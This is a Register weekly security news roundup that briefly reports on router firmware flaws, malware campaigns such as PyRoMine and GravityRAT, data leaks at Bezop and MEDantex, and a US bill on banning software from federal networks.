Windows USB-stick-of-death, router bugs resurrected, and more

Your weekend guide to computer security cockups

41 Reg comments Got Tips?

Roundup Here's your summary of infosec news – from router holes to Windows crashes – beyond what we've already covered this week.

TPLink? More like TPwnedLink, amiright? Anyone?

Tim Carrington at Fidus Infosec went public on Thursday with not-so-new remote-code execution flaws in TPLink router firmware. We're told the security holes (CVE-2017-13772) were not only reported to TPLink in October 2017, but were vulnerabilities that the company had patched in older models, only for the bugs to resurface when the exploitable code was reused in newer units.

"Code reuse is a huge problem within the IoT industry," Fidus stated in its advisory. "In most cases, what we generally see is a company who sells devices with poor security to vendors who then brand them and sell them on. Tracking the original manufacturer can be quite difficult and, in our experience, getting such vulnerabilities patched is even harder."

The stack-overflow bugs can be exploited via the built-in HTTP web server, used to configure the device, to gain control of the router. It appears to have to be able to log into the equipment to leverage the programming blunders, so make sure you're not using the default credentials.

DiFi wants an express lane for banning software

Fresh on the heels of Uncle Sam blacklisting security company Kaspersky Lab from its computers, US Congress mulls streamlining the process of blocking particular software packages from being used on government networks and systems.

Senator Dianne Feinstein (D-CA) is putting her name on the Federal Network Protection Act, a bill that would give the Secretary of Homeland Security the ability to issue binding operational directives – strict orders, in other words – to remove software from federal networks without requiring that the vendor be notified first.

"We're seeing more and more attacks on federal computer systems by foreign agents, and we need to make sure we have all the tools and authorities necessary to block those attacks,” Feinstein said.

"By clarifying what actions the Secretary of Homeland Security can take, we allow the department to act quickly in response to cyber threats."

PyRoMine fires up EternalBlue flaw to forge Monero

Another day, another pack of criminals finding new and creative ways to make a buck on cryptocoins.

This time, it's the creators of a horrible piece of malware called PyRoMine. It uses the compute power of infected Windows machines to generate Monero cryptocurrency for its controllers. What's worse, the code spreads itself using the infamous EternalBlue and EternalRomance NSA-developed exploits. Sounds scary, but as Mounir Hahad of Juniper Threat Labs told El Reg, both flaws have long-since been patched by Microsoft. If you're infected via these exploits, you need to take a long hard look at yourself.

"EternalRomance and EternalBlue are only made eternal by our inaction," Hahad said.

"A patch to close the vulnerabilities that these exploits use has been available since before the WannaCry era."

Bezop says be-ware, we got be-reached

Elsewhere in the world of internet funbux, blockchain commerce biz Bezop is on the defensive after researchers at Kromtech disclosed that the upstart had exposed to the public internet a poorly configured MongoDB database containing the names, email addresses, hashed passwords, and scans of IDs and passports for 25,000 of its ICO backers.

Bezop says it's no big deal, as the incident actually occurred in January.

"If you remember, we reported a DDoS attack and a couple of security holes that unintentionally exposed user data such as name, wallet addresses, address on file, copies of identification documents, etc., and that they could possibly be in the public domain. That database has since been closed and secured."

We're sure the 25,000 people whose passport images were leaked out will find that very comforting.

Cisco smells a RAT

Cisco Talos researchers dished the dirt on GravityRAT, a software nasty targeting peeps in India. They say the malware was used to pull sensitive information from companies and organizations in the country for nearly two years before it was caught.

"GravityRAT has been under ongoing development for at least 18 months, during which the developer has implemented new features. We've seen file exfiltration, remote command execution capability and anti-vm techniques added throughout the life of GravityRAT," Talos writes.

"This consistent evolution beyond standard remote code execution is concerning because it shows determination and innovation by the actor."

Quick links

MikroTik router owners must patch their devices' firmware to prevent miscreants from exploiting a flaw in a remote administration service to swipe a copy of the user database – it is already being leveraged in the wild by scumbags to commandeer affected hardware. Also, don't forget to secure access to your HPE iLO management interfaces for your servers: hackers are exploiting poorly defended networks to hold systems to ransom.

Bitdefender bloke Marius Tivadar has developed a dodgy NTFS file system image that crashes at least Windows 7 and 10 systems: popping it on a USB stick and then plugging that into a vulnerable computer will cause it to fall over with a blue-screen-of-death when a mount attempt is made. Microsoft will not issue a patch for the programming blunder, we're told.

Medical transcription biz MEDantex leaked patient records for thousands of physicians online, according to investigative reporter Brian Krebs. Revenge porn web exchange Anon-IB was seized by Dutch police, who also collared five suspects related to the image-sharing site.

If you go traveling with your Mac, or leave it unattended around strangers, try out Objective-See's new Do Not Disturb app that thwarts evil-maid-style attempts to tamper with your computer or infect it with spyware.

Finally, Check Point warned that your Windows login details can be nicked by opening malicious PDFs that use remote document loading mechanisms to leak your credentials. ®


Biting the hand that feeds IT © 1998–2020